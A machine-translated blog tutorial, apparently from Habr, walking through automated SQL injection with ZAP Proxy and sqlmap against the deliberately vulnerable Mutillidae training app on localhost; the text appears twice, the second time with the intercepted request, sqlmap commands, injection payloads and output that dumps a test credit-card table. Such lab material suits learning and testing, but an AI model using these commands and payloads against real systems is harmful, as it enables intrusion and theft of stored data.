A1: 2017 - Injections (Part 3 and Last)
In my favorite computer game Quest for Glory 2: Trial by Fire, when the world is once again in danger, the protagonist enters the University of Wizards. After successfully passing the entrance examinations, the bearded wise wizards offer to enter this University, because, having finished it, we will understand all the intricacies of magic, learn all spells, and then we will definitely save our friends and defeat the world's evil. The only problem is that 15-20 years to learn, and during this time the forces of evil will have time to win and not just once.
Every time I involuntarily recall this episode, when I have another interesting book or a pile of technical documentation in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: I figured out the basics, I sorted out examples - then just automation!
Now that we’re just about how the injections work, so why not try to simplify your life for yourself and once again analyze some last example, but with the help of additional software. We need two tools:
Sqlmap is a tool that allows you to automate the search and exploitation of vulnerabilities in SQL and ZAP Proxy - a local proxy server, which is needed to analyze traffic between the browser in a web server.
')
Again, you need to mention that these are not the only such tools, and you will surely prove to you in a neighboring blog that you need to deal with sqlninja instead of sqlmap, and you don’t need to waste time on ZAP when there is a Burp. I will not argue with anyone.
To make life easier, we will start by intercepting the traffic between the client and the web server. The resulting data will be used as parameters for sqlmap. By and large, the URL of the vulnerable application can also act as such a parameter, but now the data from the proxy will be clearer for us.
We will work with the same example from A1, which we discussed in the previous article (“SQLi - Extract Data”> “User Info (SQL)”).
Go to this page through our ZAP Proxy and enter some data. I understand that it is tempting to try something out of what we have learned, but right now you just need to enter any obviously wrong data. I enter my favorite admin / password and receive in interception this request:
Here we are primarily interested in the first line, namely the request. Sometimes it is useful to check whether we have intercepted. This can be done by repeating this generated request in the same browser. If we get the same error page, then we are on the right track.
Let's save our intercepted request as a separate file request_sqlmap.txt.
And now we will transfer this file for analysis in sqlmap:
We need the –banner parameter so that sqlmap tries to determine which DBMS we are dealing with. In our example, this is not so important, but in practice you will be able to speed up testing, without being distracted by aspects of other DBMS that are not applicable to your goal.
The scan was completed successfully, and once again we saw that, in general, we already knew:
In addition, sqlmap determined that we are dealing with mysql, or rather its fork. Now let's see what databases are on the server:
Hereinafter we will specify our interception file as a parameter for sqlmap. In addition, we will specify the parameters that we already know: the type of the DBMS, as well as the -dbs key, in order to get data about the existing databases:
Fine. Usually, the bases are given some meaningful names, or they are created automatically when installing applications. The principle of "Security by obscurity", of course, has not been canceled, but this is the exception rather than the rule. The most interesting thing in our case, apparently, is the mutillidae base, let's see what it consists of:
Here, we will add the necessary DBMS and the –tables key to the things we know about to look at the tables in this database:
Already not bad. Especially promising is the credit_cards table. Let's look into it:
and get:
Wow, yes there is a whole table where credit card data should be stored! Since we've come, let's look at this table:
Oops:
Here they are, our credit cards. Two questions should now sound in your head: how does it work and where does all this data come from?
How it works? Well, strictly speaking, just as if you were going through all the possible options, trying to randomly exploit this or that vulnerability.
But where the data come from, the question to the administrator, who posted such important information in such an inappropriate place.
Sqlmap has dozens of parameters that we cannot parse in one article. But the task of my articles is to introduce the decision, and then it is up to you. Try at your leisure to dig in the same bases and experiment with the parameters, perhaps credit cards are not the most interesting. =)
Read the blog of the author of the article at this link .
Every time I involuntarily recall this episode, when I have another interesting book or a pile of technical documentation in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: I figured out the basics, I sorted out examples - then just automation!
Now that we’re just about how the injections work, so why not try to simplify your life for yourself and once again analyze some last example, but with the help of additional software. We need two tools:
Sqlmap is a tool that allows you to automate the search and exploitation of vulnerabilities in SQL and ZAP Proxy - a local proxy server, which is needed to analyze traffic between the browser in a web server.
')
Again, you need to mention that these are not the only such tools, and you will surely prove to you in a neighboring blog that you need to deal with sqlninja instead of sqlmap, and you don’t need to waste time on ZAP when there is a Burp. I will not argue with anyone.
To make life easier, we will start by intercepting the traffic between the client and the web server. The resulting data will be used as parameters for sqlmap. By and large, the URL of the vulnerable application can also act as such a parameter, but now the data from the proxy will be clearer for us.
We will work with the same example from A1, which we discussed in the previous article (“SQLi - Extract Data”> “User Info (SQL)”).
Go to this page through our ZAP Proxy and enter some data. I understand that it is tempting to try something out of what we have learned, but right now you just need to enter any obviously wrong data. I enter my favorite admin / password and receive in interception this request:
GET http://127.0.0.1/mutillidae/index.php?page=user- info.php&username=admin&password=password&user-info-php-submit- button=View+Account+Details HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega Connection: keep-alive Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 Here we are primarily interested in the first line, namely the request. Sometimes it is useful to check whether we have intercepted. This can be done by repeating this generated request in the same browser. If we get the same error page, then we are on the right track.
Let's save our intercepted request as a separate file request_sqlmap.txt.
And now we will transfer this file for analysis in sqlmap:
sqlmap -r reqest_sqlmap.txt --banner We need the –banner parameter so that sqlmap tries to determine which DBMS we are dealing with. In our example, this is not so important, but in practice you will be able to speed up testing, without being distracted by aspects of other DBMS that are not applicable to your goal.
[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests: --- Parameter: username (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details --- [23:20:10] [INFO] the back-end DBMS is MySQL [23:20:10] [INFO] fetching banner web server operating system: Windows web application technology: Apache 2.4.29, PHP 7.2.3 back-end DBMS: MySQL >= 5.0 banner: '10.1.31-MariaDB' [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1' The scan was completed successfully, and once again we saw that, in general, we already knew:
[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable In addition, sqlmap determined that we are dealing with mysql, or rather its fork. Now let's see what databases are on the server:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbs Hereinafter we will specify our interception file as a parameter for sqlmap. In addition, we will specify the parameters that we already know: the type of the DBMS, as well as the -dbs key, in order to get data about the existing databases:
[23:27:19] [WARNING] reflective value(s) found and filtering out available databases [6]: [*] information_schema [*] mutillidae [*] mysql [*] performance_schema [*] phpmyadmin [*] test Fine. Usually, the bases are given some meaningful names, or they are created automatically when installing applications. The principle of "Security by obscurity", of course, has not been canceled, but this is the exception rather than the rule. The most interesting thing in our case, apparently, is the mutillidae base, let's see what it consists of:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables Here, we will add the necessary DBMS and the –tables key to the things we know about to look at the tables in this database:
[23:29:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae [13 tables] +----------------------------+ | accounts | | balloon_tips | | blogs_table | | captured_data | | credit_cards | | help_texts | | hitlog | | level_1_help_include_files | | page_help | | page_hints | | pen_test_tools | | user_poll_results | | youtubevideos | +----------------------------+ Already not bad. Especially promising is the credit_cards table. Let's look into it:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns and get:
[23:31:35] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [4 columns] +------------+---------+ | Column | Type | +------------+---------+ | ccid | int(11) | | ccnumber | text | | ccv | text | | expiration | date | +------------+---------+ Wow, yes there is a whole table where credit card data should be stored! Since we've come, let's look at this table:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump Oops:
[23:32:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [5 entries] +------+-----+----------------------------+-----------------+ | ccid | ccv | ccnumber | expiration | +------+-----+----------------------------+-----------------+ | 1 | 745 | 4444111122223333 | 2012-03-01 | | 2 | 722 | 7746536337776330 | 2015-04-01 | | 3 | 461 | 8242325748474749 | 2016-03-01 | | 4 | 230 | 7725653200487633 | 2017-06-01 | | 5 | 627 | 1234567812345678 | 2018-11-01 | +------+-----+----------------------------+-----------------+ Here they are, our credit cards. Two questions should now sound in your head: how does it work and where does all this data come from?
How it works? Well, strictly speaking, just as if you were going through all the possible options, trying to randomly exploit this or that vulnerability.
But where the data come from, the question to the administrator, who posted such important information in such an inappropriate place.
Sqlmap has dozens of parameters that we cannot parse in one article. But the task of my articles is to introduce the decision, and then it is up to you. Try at your leisure to dig in the same bases and experiment with the parameters, perhaps credit cards are not the most interesting. =)
Read the blog of the author of the article at this link .
Source: https://habr.com/ru/post/429706/
All Articles